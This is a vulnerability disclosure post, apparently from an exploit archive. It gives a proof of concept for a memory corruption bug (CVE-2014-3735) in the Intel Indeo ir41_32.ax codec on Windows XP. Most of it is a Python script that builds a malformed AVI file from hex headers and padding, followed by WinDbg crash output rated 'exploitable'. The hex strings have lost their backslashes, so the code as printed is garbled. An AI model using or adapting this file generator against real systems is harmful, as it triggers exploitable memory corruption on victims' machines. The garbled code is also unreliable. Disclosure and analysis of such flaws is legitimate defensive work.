Home / exploits Intel Ideo Video 4.5 Memory Corruption
Posted on 16 May 2014
# Exploit Title: [Intel Ideo video 4.5 ir41_32.ax version 4.51.16.3 Memory Corruption ] # Date: [2014/05/12] # Exploit Author: [Aryan Bayaninejad] # Linkedin : [https://www.linkedin.com/profile/view?id=276969082] # Vendor Homepage: [www.microsoft.com] # Software Link: [http://www.dll4you.com/files/ir41_32.ax.html] # Version: [Version 4.51.16.3] # Tested on: [Windows Xp Sp 3 x86 ] # CVE : [CVE-2014-3735] ------------------------------------ details: ------------------------------------ ir41_32.ax version 4.51.16.3 used in microsoft windows Xp sp3 x86 suffers from an Exploitable memory corruption Vulnerability via a malformed .avi file format when load c:/windows/system32/ir41_32.ax for handle avi header Note: For trigger this issue use of Media Player Classic Or Kmplayer ------------------------------------- Poc: ------------------------------------- header1 = "x52x49x46x46xE8x69x04x00x41x56x49x20x4Cx49x53x54xC0x00x00x00x68x64x72x6Cx61x76x69x68x38x00x00x00x9Bx6Fx00x00x5Ex74x01x00x00x00x00x00x10x08x00x00x6Ex00x00x00x00x00x00x00x01x00x00x00x02x0Cx00x00x00x01x00x00xF0x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x4Cx49x53x54x74x00x00x00x73x74x72x6Cx73x74x72x68x38x00x00x00x76x69x64x73x63x76x69x64x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x23x00x00x00x00x00x00x00x6Ex00x00x00x02x0Cx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01xF0x00x73x74x72x66x1Fx00x00x00x28x00x00x00x00x01x00x00xF0x00x00x00x01x00x18x00x49x56x34x31x00x1Cx02x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x4Ax55x4Ex4Bx18x07x00x00x00x00x00x00" pattern1 = "A" * 1808 header2 = "x00x00x00x00x4Cx49x53x54x08x5Bx04x00x6Dx6Fx76x69x30x30x64x62x72x07x00x00xF8xFFx83x70x07x00x0Ex0Fx00x10x80x0Fx00x00x86x59x0CxE9x7Dx00x80x17x00x0DxE9x05x86x40x8Bx6CxC0xE0x10xC2x53xF2xD2x10x61x31x73x81x03xFEx77x1Ax00x00x9ExE7x79x9ExE7x79x9ExE7x79x9ExE7x79x9ExE7x79x9ExE7x79x9AxE7x79x9ExE7x78x9ExE7x79x9CxE7x38x9ExE7x79x9ExE7x79x9ExE7x79x9ExE3x79x9ExC7x79x9ExE7x79x9ExE7x79x9ExE7x79x9ExE7x79x9ExE7x78x9ExE7x79x9ExE7x79x9ExE7x79x9ExE7x78x9ExE7x69x9ExE7x79x9AxE7x69x9AxA7x69x9ExE7x79x9ExE7x79x9ExE7x79x9ExE7x79x1ExE7x39x1Ax63x39x1ExE7x79x8ExA7x58x9Ex22x20x9ExE7x79x9AxE7x79x8ExA3x39x9ExE7x79x9ExE7x79x9ExE7x79x9ExE7x79x9ExE7x79x9ExE7x79x9ExE7x79x0ExE7x79x9ExE7x79x9ExE7xF9xF0x1CxCFx72x30xC7xF2x3CxCFxF3x3CxC7x03x1Cx0Fx72x18xC0xF3x3CxCFx52x3CxCFx93x04x4Fx23x3Cx4Ex03x4FxB8xEBxE2xECx98x90xEDx80x97xC5xF5x31xB7xCDxDEx71x7CxC0x87x26x8Ax57x13xEFxF1x03x91x92x53x50xB2x84x06xFBx11x77x6Cx72xABx64xF0x9Ex57xDDx64x31x4Fx5CxC9x76x44xCAx16x0Cx47xBCxA8x89x65x62x70xE2xEAx80x17x4Ex5Cx91x47xF1xA1x18x94x38x62x9CxB8x3Ax60x97x25xE4xBCx89x89x60x61x60x2Dx64xD3x3AxC6x22x8Ax85x3Dx48x93xB3x20x45x6Ex63xC0xE6x86xE0x93xC4xC8xD9x51xF0xA2x78x13xC1xA6xBCx22xBAx59x90x2BxF6x22xEAxC9x23xE1xA5x43xB1x75x1FxF0x22x12xD3xE2xBDx9DxC4x31xD1xCCxECx04x23x43xDFxB3x79xCCx0DxE7xB2x71xC5x3Ax32x07xB2x0Ex13xC1x19xC1x75xC4x78xC0x10xECxD5xC5xC2xD6x2CxC5x56xC5x6DxB3x17x6Fx46xF2x03x71xD6xACx8DxDCx86xDCx10xACxD5x2Cx47x24x71x4Cx70xC5xCCxCExC0x47x3Bx95x9BxE2xFAx88xA7x44xB1x3FxE2xE9x31x6Bx05x4Bx15x83x9CxF1xB0x39x0Bx52xD9x8Fx9AxA5x0Dx0AxD9x26xF6x9Ax70x0Dx0Ax52x3ExC4x81x9CxB3xB0xBDx63xE6x8Ax5BxD6xC0xE3x63x9Ex2Ex51x72x5Bx74xCAx56x0Cx5Cx2Bx4BxC9xD5x31x1Ex10x21x73x11xC7xACx39x18xE4xC4x4Dx61x37x51x64x61x71x75xC0xDCx24xC1xCEx80x3Cx95x95xE2x8CxB7xDCx76x31x74x33x14xB7xDCx18xBCxE4x55xC9x8DxF7x78xCCxC6x3Ax31x7Fx10xCEx82x34x78x75xC0xC2x7Bx82xC7xCDx73xD9x8Ax96x39x82x9BxE6x9Cx10xABx19x8Ax6Bx79x4Fx16xE7x35xF1xF4x9Ex54xA2x58xD9x8AxBDxD8x9AxEBxE6x6Cx62x1Dx39x43x6Ex8Fx39x33x09xD4x66x61xF7x35x37x24x51xC4x18x5Cx07x37xB2x94xACx5Cx33x44x10x13xBFxF1xFCx2AxE6x91x6Fx7BxC8x4BxAEx39xABxE6x8Ex6Bx0Cx83xBDx82xB3x63x92xA8xE0x6Dx85x3Cx2Fx0Ex82xCBx0Ex86xD3x7Bx9ExF2x9ExC7x13x37xD1xECxC5x36x71x6DxF3xA1x1Bx3Dx60xE3x95xD1x6CxC5xDDx01xD9xCDx39x3Bx6FxA4x83x94xFCx40xDCx70x7BxC0x7ExC0xE2xC4x53x66x86x60x90x59x79xC3x75x29x67xBCx65x93x3DxB8x2Ax31x08xB9x0Ex39x63x60x8FxA0x27x26x79xC2x58x2Fx87x18x96x89x27x9CxD5x11x4FxF8xD0xF9x32x3Fx36x4Fx78x91x51x4Ax66x34x77xB1x1Ax2CxAExCAx35xD9x3Cx7Dx44x3Cx62x2Dx6Ex27xDEx1Fx71x53xBCx2Ax42x79x7AxC4x52x7CxA4xE2xA5xDCx15x23xAFx8ExC9x91x0Fx51x8Cx3Cx66x9ExF8x18x45x14x1Fx5CxE6x90x8Fx51x8Cx3Cx66x0Bx9Bx37x45x14x8FxABxB8x29x9Ex16x51x3Cx2Cx86xE2x8ExE0x96xB9x78x49xD6x93x47xC2x75x24x59xBCx27x8Bx57x15xCCxCAxF3x7AxF2x48x08x5Ex1Dx31x14x77xBCx28xBExF7xCDx6Dx2CxD1xF2x4BxBCx38xE2x86xE0xB2xA9x81x8Fx80x7CxCCx58xD8x8Cx91x8Fx40xF0x09x9Bx25x06x3Ex32x1Fx37x07x3CxE5x53x92x3Cx6Ex66x07x3Ex01xC9xC7x8Cx81xA5x47x3Ex02x1Bx9FxF6x94x37x11xBCx67xE1x71x46xB3x36x1Fx83x17x87x5CxF7xC4xC7x40x1Ex46x90xC9x4Bx06x3Ex78x73xC7x15xAFx0Cx9Ax97x5CxCBx79xF3x21x98x59x39x97x97xBCx1Ax82x2Bx36xDExF6xC4x55xF0xC5x22x46x79xB8x46xF4x07x09x3ExF5xD1xC8xE2xCCxE7x8BxE6xCDx6Cx68xF0xF1x1FxF1xA6xF8x54x27x9Cx1ExF3x51x8Fx38x8BxE4xD3xCDx3FxC5xCCx67x35xF1x88x8Fx59xA3xACxB3xD3x07xE1x33x1Ex11x47x7Cx8Ax41x6Ex0ExF9x58x47x64xF1xE9x6AxF2x83x72x11x3Cx2FxCEx8Ax4Fx31xF7x27x0FxE6xE1x80x4Fx53xE4x11xB7x35xF2xF0x13xF3xF1x8BxBDxB8x1Dx98xE7x03x2Ex42x54x3Ex5Ax1Cx72xC1x56x6CxC5x65x1Ex73xB6x1CxF0xB4x88x90xEBxE4xFAx84x0FxA1xACxC5xC0x07x98xF9x08xACxCAx8Bx85x97x87x0CxC5xC6x47x3BxE1xFDxC0x50x6Cx85xC5x82x0CxC8x80xC8x80x04x41x12x04x81xC8xC2xCAxC2x40x22x1Bx33x72x46x32x73x45xB2x32x30x20x49x10x04x33xB2x20xC9x86xC8xC0x5Ax0Cx0CxBCx20x90x0Dx19x90x60x40x24x18x08x64xC0x62x61x60x8Dx51x82x85xAFxEFx30x84x7Cx81x39xC6x89x97xACxCFx92xA1x65x23xF8x66x5ExC5x30x84x1Ex46xF8x61x3Ex10x9Fx6Bx8Dx88x63x2Ex48x6Ex98x99x49x36x82x1DxB9x62x27xD8x58xD9x48x92x60xE1xA3xB5x6Cx2Dx5FxCAx3AxE6x2ExA2xF9x02x24x9FxE3x19x37xCDxC7x3Ax15x4FxE5x8BxC6x14xDCxF0x69x4Ex25x4Ex7DxF2x50xF8x14x07x87x5CxE5xC4x27x6Bx26x3Ex26xD7x27x7CxF6x66x6Ex3Ex61x73x96x4Ex7Cx76x1ExC6x01x57xBCx8Dx2Ex3ExA6xF5xE4xA1x70x31xFCx1Ex1Fx7Cx7Ex76x92xCAx47x5Dx3Ex2CxDFx3Bx8Ex79x93x4ExCAxFEx81x4ExF8xA8xABx1Fx9BxF7x73x1ExBFx8Bx27xA7xC2x67x9CxF9x00xBExE3x63x24x37x5Cx07x03xE7xC3x01xFBxE9x3Dx57xCDxA7x30x78xDAxDCx9Dx12xA7xCCx56xF0xF0x11x1FxE2x14x0Dx66x49x9Ex36x73x73xCEx5Cx3Cx3Dx25x3BxB8x2Ex46x3Ex6ExB1x73xD6x9Cx37x4Fx79x11x15x6Cx13x0FxB9xB3x92x0Fx3Dx72xE9xCCxD3x52x6Ex79x5FxD8x1Ax2Cx11x13x59xF8x88xADx8BxADxB9x0Cx43xDExE7x10x1Fx94x41x16xE5x23x13x4Ex64xB1xF3x22xD4x27x0Fx84xABxE1x2Bx71x36x10x1Fx8Fx6Fx51x93x7CxEAxD5xE3x78xC7x65x55xF0x29x57x4Bx56xABx0ExF8x0CxC9x27xD4xA1xF8xF8x92x38xD8x72x46xF3x71xCDxE2xEAx48xEEx8Ax2CxD6x62xE0x86x9Dx8Dx85xDBx62x2BxCEx08xF6x62xE6x8ExE0x2Bx87xC5xA6xDCx71xCEx4Dx31x72xC8x8Bx67x4Fx1Ex09x2Fx59x63x62x95x65xE2xFCx88xB3xE2xCCxE4x86x95x91xF7xC5x56xBCx3Ax62x53xDEx90x0CxDCxBExE6x8Ex9Dx2FxBBxDDx2CxFBxF1x3Ax84x1Fx2AxB3x79xB1x5Ex9Cx2Fx9FxCDx77xA9x4FxB6x84xEFx86x47xF2xA2x32xB8x33x8Bx1Bx02x8Bx85x20x10x59xD8x19x08x44x06x02x91x20x90x40xBEx79x1Cx30x38x12x23xDBx47x24x1DxB1x58x8Ax4Dx9Ex4Bx14xC5x99x32xB2x29x1Bx0Bx16x03x03x12x24x0Bx33x2Bx12x2Cx6CxCCx2Cx2Cx04x12x0Cx24x81x04x12x48x10x24x03xF2x1Dx8Ex78xCAxC3x68x6Ex26x16x4Ax5Ex75xF0x34x3BxF8x34x72xC5x2Ex1Bx1Bx03x03x22x0BxE7x5Cx71xCExCAxC0xCCxC2x19x41x32x30x90x6Cx04x03xC9x80x48x20x03x12x24x03x0Dx0A" pattern2= "A" * 1035 data = header1+pattern1+header2+pattern2 outfile = file("poc.avi", 'wb') outfile.write(data) outfile.close() print "Created Poc" ------------------------------------- windbg result: ------------------------------------- 0:005> g ModLoad: 76360000 76370000 C:WINDOWSsystem32winsta.dll ModLoad: 76fd0000 7704f000 C:WINDOWSsystem32CLBCATQ.DLL ModLoad: 77050000 77115000 C:WINDOWSsystem32COMRes.dll ModLoad: 74810000 7497d000 C:WINDOWSsystem32quartz.dll ModLoad: 75f40000 75f51000 C:WINDOWSsystem32devenum.dll ModLoad: 77920000 77a13000 C:WINDOWSsystem32setupapi.dll ModLoad: 76c30000 76c5e000 C:WINDOWSsystem32WINTRUST.dll ModLoad: 76c90000 76cb8000 C:WINDOWSsystem32IMAGEHLP.dll ModLoad: 736b0000 736b7000 C:WINDOWSsystem32msdmo.dll ModLoad: 72d20000 72d29000 C:WINDOWSsystem32wdmaud.drv ModLoad: 72d20000 72d29000 C:WINDOWSsystem32wdmaud.drv ModLoad: 72d20000 72d29000 C:WINDOWSsystem32wdmaud.drv ModLoad: 72d20000 72d29000 C:WINDOWSsystem32wdmaud.drv ModLoad: 72d20000 72d29000 C:WINDOWSsystem32wdmaud.drv ModLoad: 72d10000 72d18000 C:WINDOWSsystem32msacm32.drv ModLoad: 77be0000 77bf5000 C:WINDOWSsystem32MSACM32.dll ModLoad: 77bd0000 77bd7000 C:WINDOWSsystem32midimap.dll ModLoad: 02330000 023ab000 C:Program FilesK-Lite Codec PackFiltersLAVLAVSplitter.ax ModLoad: 6f640000 6f796000 C:Program FilesK-Lite Codec PackFiltersLAVavformat-lav-55.dll ModLoad: 69f00000 6ab71000 C:Program FilesK-Lite Codec PackFiltersLAVavcodec-lav-55.dll ModLoad: 6f540000 6f5ba000 C:Program FilesK-Lite Codec PackFiltersLAVavutil-lav-52.dll ModLoad: 023c0000 023ff000 C:Program FilesK-Lite Codec PackFiltersLAVlibbluray.dll ModLoad: 02510000 0290a000 C:Program FilesK-Lite Codec PackFiltersffdshowffdshow.ax ModLoad: 72280000 722aa000 C:WINDOWSsystem32DINPUT.dll ModLoad: 4fdd0000 4ff76000 C:WINDOWSsystem32d3d9.dll ModLoad: 6d990000 6d996000 C:WINDOWSsystem32d3d8thk.dll ModLoad: 763b0000 763f9000 C:WINDOWSsystem32COMDLG32.dll ModLoad: 02a30000 02b1a000 C:Program FilesK-Lite Codec PackFiltersLAVLAVVideo.ax ModLoad: 71100000 7117a000 C:Program FilesK-Lite Codec PackFiltersLAVswscale-lav-2.dll ModLoad: 6f400000 6f442000 C:Program FilesK-Lite Codec PackFiltersLAVavfilter-lav-4.dll ModLoad: 02b30000 02ce2000 C:Program FilesK-Lite Codec PackFiltersvsfilter.dll ModLoad: 73760000 737ab000 C:WINDOWSsystem32DDRAW.dll ModLoad: 73bc0000 73bc6000 C:WINDOWSsystem32DCIMAN32.dll ModLoad: 73940000 73a10000 C:WINDOWSsystem32D3DIM700.DLL ModLoad: 580b0000 58188000 C:WINDOWSsystem32ir41_32.ax (c0c.21c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:WINDOWSsystem32ir41_32.ax - eax=04000400 ebx=033e5c40 ecx=0020a008 edx=00000000 esi=00000000 edi=40004000 eip=580ef04c esp=0358f9e0 ebp=0000000d iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 ir41_32!ConfigureDialogProc+0x366c: 580ef04c 8907 mov dword ptr [edi],eax ds:0023:40004000=???????? 0:010> .load winext/msec.dll 0:010> !exploitable !exploitable 1.6.0.0 Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - User Mode Write AV starting at ir41_32!ConfigureDialogProc+0x000000000000366c (Hash=0x17103451.0x2940d134) User mode write access violations that are not near NULL are exploitable.
